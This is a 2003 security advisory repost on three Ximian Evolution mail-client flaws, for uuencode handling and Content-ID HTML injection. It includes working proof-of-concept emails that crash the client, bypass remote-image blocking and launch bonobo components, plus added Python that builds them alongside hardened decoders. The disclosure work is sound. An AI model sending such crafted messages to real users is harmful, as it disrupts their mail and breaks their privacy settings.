[UNIX] Multiple vulnerabilities in Ximian's Evolution Mail User Agent
From: support@securiteam.com
Date: 03/23/03
From: support@securiteam.com To: list@securiteam.com Date: 23 Mar 2003 17:52:05 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple vulnerabilities in Ximian's Evolution Mail User Agent
------------------------------------------------------------------------
SUMMARY
<http://www.ximian.com> Ximian Evolution is a personal and workgroup
information management solution for Linux and UNIX-based systems. The
software integrates email, calendaring, meeting scheduling, contact
management, and task lists, in one application.
Three vulnerabilities were found. Their exploitation ranges from denying
users the ability to read email and provoking system instability, to
bypassing security context checks for email content and possibly executing
arbitrary commands on vulnerable systems.
DETAILS
Vulnerable systems:
 * Evolution 1.2.2 and prior releases are vulnerable
Immune systems:
 * Evolution 1.2.3 and later releases are not vulnerable
Malformed UUEncoded crashes Evolution:
The Evolution mailer accepts UUEncoded content and will transparently
decode it. By including a specially crafted UUE header as part of an
otherwise perfectly normal email an attacker has the ability to crash
Evolution as soon as the mail is parsed. This makes it particularly
difficult to delete this email from Evolution's GUI and prevents a user
from reading email until the malicious mail is removed from the mailbox.
All versions of Evolution that include the function try_uudecoding in the
module mail/mail-format.c are vulnerable.
UUencoded resource starvation:
Having the Evolution mailer process mail content UUencoded multiple times
will cause resource starvation. The MUA tries to allocate memory until it
dies, possibly leading to system instability. The example in the technical
details section uses email content encoded 3 times.
MIME Content-ID arbitrary content:
By including a specially crafted MIME Content-ID header as part of an
image/* MIME part, it is possible to include arbitrary data, including
HTML tags, into the stream that is passed to GTKHtml for rendering.
These vulnerabilities provide multiple exploitation possibilities in the
Evolution mailer. Namely, it is possible:
A) To crash the application. The crash appears to be the result of heap
corruption, further research on this bug is required to demonstrate
successful exploitation to run arbitrary commands on vulnerable systems.
B) To bypass the "Don't connect to remote hosts to fetch images" option.
C) To execute some bonobo components and pass them arbitrary content
included as part of the mail.
Solution/Vendor Information/Workaround:
Ximian is providing Evolution 1.2.3 on [March 18/March 19]. This release
resolves all vulnerabilities in this advisory as well as other unrelated
bugs. The patched code for Evolution that resolves these vulnerabilities is
also already available in GNOME CVS.
A workaround for un-patched versions of Evolution to prevent Evolution
from crashing when viewing messages that exploit these vulnerabilities is
to go into "View"->"Message Display" and change the value to "Show E-mail
Source."
Distribution vendors who provide their own version of Evolution have been
advised of these issues as well as having been provided the patches to fix
them. They may provide updated packages for their distributions.
Technical Description - Exploit/Concept Code:
Malformed UUEncoded crashes Evolution:
The following email will reproduce this vulnerability, note that an empty
line is required before and after the UUE header line.
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600

end

--=-mTDu5zdJIsixETTwCF5Y--
UUencoded resource starvation:
The following email will reproduce this vulnerability.
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600 phase2
[... uuencoded data lines elided in this archive copy ...]
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@
end

--=-mTDu5zdJIsixETTwCF5Y--
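The two uuencode cases above (the "begin" header with no filename, and content
encoded several times) reproduced with a script. This is an added example, not
CORE's proof of concept and not Evolution's code: it builds messages in the
shape of the samples, decodes with a bounded loop so that nested layers cannot
starve the process, and rejects the malformed header instead of decoding it.
Addresses, filenames, the boundary string, the payload text and the depth limit
of 8 are assumptions chosen here.

```python
# Added example for this advisory's two uuencode cases; not CORE's or Evolution's code.
# Builds the message shapes the advisory shows (a "begin" header with no filename,
# and content uuencoded several times) and measures a part's uuencode nesting depth
# with a bounded decoder, the property a filter needs in order to refuse the
# resource-starvation message. Addresses, filenames, the boundary string, the
# payload text and the depth limit are constructed here.
import binascii
import email
from email import policy


def uuencode(data: bytes, name: str, mode: int = 0o600) -> str:
    """Classic uuencode: 'begin <mode> <name>', 45-byte lines, '`' terminator, 'end'."""
    lines = ["begin %o %s" % (mode, name)]
    for i in range(0, len(data), 45):
        chunk = binascii.b2a_uu(data[i:i + 45], backtick=True)
        lines.append(chunk.decode("ascii").rstrip("\n"))
    lines.append("`")
    lines.append("end")
    return "\n".join(lines) + "\n"


def uudecode(text: str) -> tuple:
    """Decode one uuencoded block and return (filename, data).

    A 'begin' line without mode and filename, which is all the advisory's first
    sample contains, raises ValueError instead of being decoded.
    """
    lines = text.splitlines()
    starts = [i for i, line in enumerate(lines) if line.startswith("begin ")]
    if not starts:
        raise ValueError("no uuencode begin line")
    header = lines[starts[0]]
    fields = header.split(None, 2)  # 'begin', octal mode, filename
    if len(fields) != 3:
        raise ValueError("malformed uuencode header: %r" % header)
    int(fields[1], 8)  # mode must be octal; ValueError otherwise
    out = bytearray()
    for line in lines[starts[0] + 1:]:
        if line == "end":
            return fields[2], bytes(out)
        if not line:
            raise ValueError("blank line inside uuencoded data")
        out += binascii.a2b_uu(line)  # binascii.Error (a ValueError) on bad lines
    raise ValueError("uuencode block has no end line")


def nest_uuencode(data: bytes, depth: int) -> str:
    """uuencode `data` `depth` times, each layer wrapping the previous layer's text."""
    blob = data
    for level in range(1, depth + 1):
        blob = uuencode(blob, "phase%d" % level).encode("ascii")
    return blob.decode("ascii")


def uu_depth(text: str, limit: int = 8) -> int:
    """Count uuencode layers in `text`, unwrapping at most `limit` of them.

    Decoding without a bound is what the advisory calls resource starvation;
    a filter should stop at a small limit and treat the part as hostile.
    """
    depth = 0
    current = text
    while depth < limit:
        try:
            _, payload = uudecode(current)
        except ValueError:
            break
        depth += 1
        try:
            current = payload.decode("ascii")
        except UnicodeDecodeError:
            break  # binary payload: cannot be a further uuencode layer
    return depth


def build_message(part_body: str, boundary: str = "=-uu-test-boundary") -> str:
    """multipart/mixed message with one inline application/octet-stream part,
    laid out like the advisory's samples (blank line before the body)."""
    return (
        "From: Tester <tester@lab.example>\n"
        "To: victim@lab.example\n"
        "Subject: uuencode test\n"
        "Mime-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="%s"\n'
        "\n"
        "--%s\n"
        "Content-Disposition: inline; filename=name\n"
        "Content-Type: application/octet-stream; name=name\n"
        "Content-Transfer-Encoding: 7bit\n"
        "\n"
        "%s\n"
        "--%s--\n"
    ) % (boundary, boundary, part_body, boundary)


def uu_layers_in_message(raw: str) -> int:
    """Parse a message and report the uuencode depth of its first octet-stream part."""
    msg = email.message_from_string(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "application/octet-stream":
            body = part.get_payload(decode=True).decode("ascii", errors="replace")
            return uu_depth(body)
    return 0


# The advisory's first sample: a bare header, no filename, nothing to decode.
MALFORMED_UUE = "\nbegin 600\n\nend\n"
# The advisory's second sample rebuilt: constructed text uuencoded three times.
NESTED_UUE = nest_uuencode(b"There she was, just walking down the street...\n", 3)

if __name__ == "__main__":
    print(build_message(MALFORMED_UUE))
    print("nested layers:", uu_layers_in_message(build_message(NESTED_UUE)))
    print("malformed layers:", uu_layers_in_message(build_message(MALFORMED_UUE)))
```

The decoder never recurses and never allocates more than one layer at a time;
uu_depth() stops at the limit and leaves it to the caller to reject the part,
which is the behaviour a gateway filter wants. The generated messages carry the
same headers and blank-line layout as the advisory's samples, so they can be
fed to a patched client to confirm that the fix holds.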
MIME Content-ID arbitrary content:
The handle_image() function, located in the module mail/mail-format.c,
lacks proper input checking. This function does not escape HTML characters
in the string returned by get_cid, which is in turn constructed from the
Content-ID MIME header included in the MIME part.
It can be exploited several ways, for instance:
a) The Evolution mailer will crash when a MIME part's Content-ID is
referenced from two different object tags via the cid "protocol". The
following email will reproduce this vulnerability in Evolution version
1.2.1:
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Content-Id: hello

Hello World!
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name1.gif
Content-Type: image/gif; name=name1.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:hello" type="text/plain"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
b) The following email bypasses the "Don't connect to remote hosts to
fetch images" option.
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

<img src="http://external.host.com:anyport">
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
c) It is possible to execute bonobo components to handle content types
that Evolution mailer does not handle internally (for example audio/ulaw).
The following mail uses the Content-ID bug to execute the
bonobo-audio-ulaw component (bundled by default with bonobo) and pass it
arbitrary content.
>From xxx@corest.com Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <xxx@corest.com>
To: xxx@corest.com
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

--=-mTDu5zdJIsixETTwCF5Y
Content-Type: audio/ulaw
Content-Transfer-Encoding: 7bit
Content-Id: mysong

There she was, just walking down the street...
--=-mTDu5zdJIsixETTwCF5Y
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:mysong" type="audio/ulaw"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-mTDu5zdJIsixETTwCF5Y
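The handle_image() bug class behind a), b) and c), as an added example rather
than Evolution's code: a renderer that splices the Content-ID into markup the
way the advisory describes, next to a hardened one that accepts only msg-id
syntax and escapes the result, both run over a message shaped like sample b).
The HTML template, function names, addresses, boundary string and the extra
well-formed logo.gif part are assumptions made here; the real template in
mail/mail-format.c is not reproduced.

```python
# Added example of the Content-ID bug class the advisory describes; not Evolution's
# code, and the HTML template, function names, addresses, boundary and the extra
# well-formed logo.gif part are assumptions made here. A renderer that splices the
# header value into markup unescaped sits beside a hardened one that accepts only
# msg-id syntax and escapes the result; both run over a message shaped like sample b).
import email
import html
import re
from email import policy
from typing import Callable, List, Optional
from urllib.parse import quote

# Content-ID must be a msg-id (RFC 2045 section 7, RFC 2392): "<" id-left "@" id-right ">".
# Only a conservative dot-atom alphabet is accepted, so nothing that can close an
# HTML attribute or open a tag gets through; a bare word such as 'hello' is rejected too.
MSG_ID_RE = re.compile(r"^<?([A-Za-z0-9._+-]+@[A-Za-z0-9.-]+)>?$")

# Assumed stand-in for the markup the mailer emits for an image part; the real
# template in mail/mail-format.c is not reproduced here.
IMG_TEMPLATE = '<img src="cid:%s">'


def render_image_vulnerable(content_id: str) -> str:
    """The advisory's bug class: the raw header value is dropped into markup, so a
    value beginning with '">' closes the src attribute and injects elements."""
    return IMG_TEMPLATE % content_id


def render_image_hardened(content_id: str) -> Optional[str]:
    """Render only syntactically valid msg-ids and escape them anyway (defence in
    depth). Returns None for anything else so the caller can drop the part."""
    m = MSG_ID_RE.match(content_id.strip())
    if m is None:
        return None
    cid = quote(m.group(1), safe="@._+-")  # percent-encode anything unexpected
    return IMG_TEMPLATE % html.escape(cid, quote=True)


def image_tags(raw: str, renderer: Callable[[str], Optional[str]]) -> List[Optional[str]]:
    """Run `renderer` over the Content-ID of every image/* part of a message."""
    msg = email.message_from_string(raw, policy=policy.default)
    tags = []
    for part in msg.walk():
        if part.get_content_maintype() == "image":
            tags.append(renderer(str(part.get("Content-Id", ""))))
    return tags


# Constructed message in the shape of the advisory's sample b): an HTML part that
# loads a remote image, an image part whose Content-ID carries the injection, and
# one well-formed image part for comparison.
SAMPLE_MESSAGE = """\
From: Tester <tester@lab.example>
To: victim@lab.example
Subject: content-id test
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=-cid-test-boundary"

--=-cid-test-boundary
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Content-Id: apart

<img src="http://external.host.example/tracker.gif">
--=-cid-test-boundary
Content-Disposition: attachment; filename=name2.gif
Content-Type: image/gif; name=name2.gif
Content-Id: "><OBJECT classid="cid:apart" type="text/html"></OBJECT><hr "
Content-Transfer-Encoding: base64

--=-cid-test-boundary
Content-Disposition: attachment; filename=logo.gif
Content-Type: image/gif; name=logo.gif
Content-Id: <logo@lab.example>
Content-Transfer-Encoding: base64

R0lGODlh
--=-cid-test-boundary--
"""

if __name__ == "__main__":
    for tag in image_tags(SAMPLE_MESSAGE, render_image_vulnerable):
        print("vulnerable:", tag)
    for tag in image_tags(SAMPLE_MESSAGE, render_image_hardened):
        print("hardened:  ", tag)
```

With the vulnerable renderer the injected OBJECT element lands in the stream
exactly as the advisory describes; the hardened renderer returns None for that
part, which is also the point at which a filter would flag the message. The
same validation belongs on the cid: references inside an HTML part, since the
bypass in b) only works once the attacker controls which part the object tag
points at.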
Vendor status:
CORE notification: 2003-03-11
Notification acknowledged by Ximian: 2003-03-11
Fixes added by Ximian to CVS tree: 2003-03-12
BID, CVE numbers assigned: 2003-03-18
Roll out of fixes: 2003-03-19
Advisory published: 2003-03-19
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisories@coresecurity.com>
Core Security Technologies Advisory.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.